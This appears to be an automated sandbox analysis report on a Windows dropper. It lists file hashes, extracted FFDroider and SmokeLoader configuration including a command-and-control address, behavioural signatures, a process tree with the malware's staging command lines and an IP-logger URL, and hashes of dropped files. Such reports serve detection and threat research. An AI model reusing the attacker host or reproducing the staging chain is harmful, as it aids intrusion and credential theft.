Analysis
-
max time kernel
1s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
30-12-2023 00:25
General
-
Target
087f267a177c35b5d313efa4b9013c14.exe
-
Size
3.8MB
-
MD5
087f267a177c35b5d313efa4b9013c14
-
SHA1
052ac70eb05ae560a882a3f97e73c80be01734e6
-
SHA256
b8338eda2c7390860da3bd4a37104b409235131406d9b4d30a78b5d4189cf317
-
SHA512
f13a98b4b2a3cc9e146ec6b58ba844d192962ea443a93f0f0237204818c7de3d4f6538fd40be7a72a53c7efc59c91a80a89539a6b92f4a448358c823b87393a1
-
SSDEEP
98304:Ub/fEIQBU9HIJ08yFximXbXVdJw1mLPUZ4ygx2EjufjKWtK:UbfEIvdIJ0/xHXDHJwSsZ3rEAjKx
Malware Config
Extracted
ffdroider
http://128.1.32.84
Extracted
smokeloader
pub2
Signatures
-
FFDroider
Stealer targeting social media platform users first seen in April 2022.
-
FFDroider payload 2 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 8 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 35 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\087f267a177c35b5d313efa4b9013c14.exe"C:\Users\Admin\AppData\Local\Temp\087f267a177c35b5d313efa4b9013c14.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Fille.exe"C:\Users\Admin\AppData\Local\Temp\Fille.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Crescente.ini3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:33⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffebde946f8,0x7ffebde94708,0x7ffebde947183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,15844300303806620280,13195519144767569481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:83⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 14003⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\xtect20.exe"C:\Users\Admin\AppData\Local\Temp\xtect20.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd1⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^lmesxrORijUjeOjnoLtleIpFEzCCKScCJihKoesqpDBLYVUYVpGiCQFBdvNwBjigQsDUABfuxtqninHJmDGAjhqSBLxMfdnXvjUGsqbxTANbPixRPrCXGGeDdLaPiD$" Piramide.ini2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.comMantenere.exe.com k2⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.com k3⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe4⤵
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 302⤵
- Runs ping.exe
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5276 -ip 52761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 6041⤵
- Program crash
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD560fda22bdeacf110bd17e573d4755179
SHA19ec652c1adfdd612ff94d5405b37d6ce2cdeee58
SHA25675c08d47e30fb238396887e7dfe14468e8f55563fd157ff27620e91e37a9a9a0
SHA51229b5a77bbf9ab7dfd6914fdb7ca516c329aa6dcd23958276f2373566ce94b294add0ecd241f83ff77456a558b2089d7d2cee0867b1b5de7630f62b3b73848afb
-
Filesize
239KB
MD59d8cf8de9b97800927728c11c3ea1a05
SHA10f22a1883ee171c6dd3ca2a7989e3585852fb3e7
SHA256684be08639023e02b2940bea89373e8657bf7b4fb826d22455058ae40f3b57f3
SHA512021834c482a20e7d998ffd8af980f0b73a16c13967966d9ec211d269ec2df990d8f5313b9567e5daaa590dfa91abe2ec57a7a9693197e110b75f035b6f404887
-
Filesize
109KB
MD55bf6fe82f1ebb35797c6ed0f2d436196
SHA166a4230de9fabb7fdd05f6bed96a66943e001675
SHA2568aede60244b9708609f9ee2061de969a8e7e4a3bef450993d49a63cf97f7d696
SHA512c35a6ce90033057ad2dfe339c903ad2feb319d2b793be04697b8d494eff3a15588093e52ed96e11c06b1cd2cfc940fd4e2c93b928f8a2db6748b137b10133d84
-
Filesize
1024KB
MD505bbcad2bf03d73b09f7a3690b0da171
SHA173867be1daf0ada50d198d2e1f4c493515d24c38
SHA256b586b8d4e59ee76fc2eb6cd8c0dee0b0f4323906e88da666551f7d8eb0d5752f
SHA512fe62ffcfd545af3a04df78c863aa44fcd56bc4a096183351bd23ac4d89b9d85d78e6749be6735451124258df1331a181d2e93afcad5bd874aa52926472925155
-
Filesize
93KB
MD55b466500d453b3c5e1d40eb6727b3c6f
SHA1779dea12b0cf2e0a7ca370124dd4397c6ec41d31
SHA256b81b1ebecfb078db3ce195a2d87c734c92145c9986f89a041539af3bfa0fec77
SHA512aa4816a693e83d13483e41ae29361c1a08776fa9168bd545160099e5c731f9eaef59d751bac3e6b4a6c031ad0f139f7d13ab6616713e7dad16702c8bd7f70f4b
-
Filesize
712KB
MD5b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
Filesize
93KB
MD5d2b3c5899a84579049b3f5bb203e37b4
SHA1766c179c3e69954a8e812c41596c23954c591f61
SHA2567076f2937e754bc3a86c725a23c9a970a064ebc74d05d69c5d5a16ecc03dd0f1
SHA512f27dcc626d42307b8d70f7f3d869e906bf899ff048046e952544481a79dc67653e112b2fd8e4c9e270b9e0c8e7199ec537c70ce031553fd5895614f0edcf01c7
-
Filesize
92KB
MD5709affa23369fc387727be5ab12d631f
SHA1e3f39bf8c4fcd17874babdeba6fff6eb57ac3a48
SHA2569731c8cfb1d06adc0ab6a791d0e340b13f7f1cfab385b3ddf1d57f374af0968b
SHA5121e7acb5dd96c9a697dcc60225213afe219a3a4345a76cdca28997491208ef6e2303e7cb8cabd14552da40b32f4ba966ddae2b6d125b15a5925f134bb814692d4
-
Filesize
36KB
-
Filesize
340KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
24KB
-
Filesize
152KB
-
Filesize
10.8MB
-
Filesize
200KB
-
Filesize
24KB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
4KB